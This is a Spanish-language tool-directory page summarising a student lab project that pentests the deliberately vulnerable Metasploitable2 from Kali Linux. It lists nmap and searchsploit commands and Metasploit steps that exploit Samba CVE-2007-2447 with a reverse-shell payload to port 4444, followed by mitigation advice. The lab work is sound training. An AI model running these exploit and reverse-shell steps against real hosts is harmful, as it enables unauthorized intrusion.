Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Penetration-Testing-on-Metasploitable2 — Proyecto práctico de pentest utilizando Kali Linux contra Metasploitable2. Incluye el flujo de trabajo completo: escaneo con Nmap, enumeración, explotación con Metasploit (Samba CVE-2007-2447), validación posterior a la explotación y pasos de mitigación. El repositorio contiene comandos, resultados y un informe que muestra tanto técnicas ofensivas como recomendaciones defensivas. | Kitploit
Herramientas/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
ReconocimientoEscáneres de VulnerabilidadesMapeo de RedesAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

Ver RepositorioSitio web
1hace 11 mesesAún no revisado

Acerca de

Proyecto práctico de pentest utilizando Kali Linux contra Metasploitable2. Incluye el flujo de trabajo completo: escaneo con Nmap, enumeración, explotación con Metasploit (Samba CVE-2007-2447), validación posterior a la explotación y pasos de mitigación. El repositorio contiene comandos, resultados y un informe que muestra tanto técnicas ofensivas como recomendaciones defensivas.

Compartir

Proyecto de Prácticas 2 — Pruebas de Penetración en Metasploitable2

  • Resumen: Este proyecto demuestra un flujo de trabajo completo de pruebas de penetración: reconocimiento, enumeración, explotación, validación post-explotación y recomendaciones de mitigación. El objetivo utilizado es Metasploitable2 y la máquina de ataque es Kali Linux.

  • Herramientas: Kali Linux (atacante) Nmap (reconocimiento) Metasploit Framework (explotación) SearchSploit / Exploit-DB (triaje)

Pasos realizados:

  1. Escaneo: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x Servicios identificados (ejemplos): vsftpd 2.3.4 (banner del puerto 21), Samba smbd 3.x (puerto 445).
  2. Enumeración y triaje: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 Se relacionaron los servicios con posibles exploits (puerta trasera de vsftpd, username-map de Samba).
  3. Explotación
  • Se intentó la puerta trasera de vsftpd (CVE-2011-2523) — el banner de Nmap estaba presente pero el servicio no respondía; el exploit no creó una sesión.
  • Samba (CVE-2007-2447) se explotó con éxito: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit Se obtuvo una shell interactiva y se validó el contexto de usuario.
  1. Post-Explotación
  • Se verificó la información del sistema: id uname -a
  • Se recopilaron evidencias y capturas de pantalla.
  1. Recomendaciones de Mitigación
  • Escaneo periódico e inventario de activos.
  • Parcheo oportuno y actualizaciones de versión (actualizar Samba).
  • Restringir el acceso a puertos críticos (reglas de firewall).
  • Deshabilitar servicios no utilizados y el acceso anónimo.
  • Aplicar privilegios mínimos a los recursos compartidos y a las cuentas.
  • Segmentación de red y registro/monitoreo.
  • Planificación de respuesta a incidentes.

Resultado Se obtuvo con éxito una shell remota mediante un exploit de Samba, se documentó la ruta de ataque y se elaboró un plan de mitigación. Los registros completos y las salidas de los comandos están almacenados en la carpeta scans/.

Descargar herramienta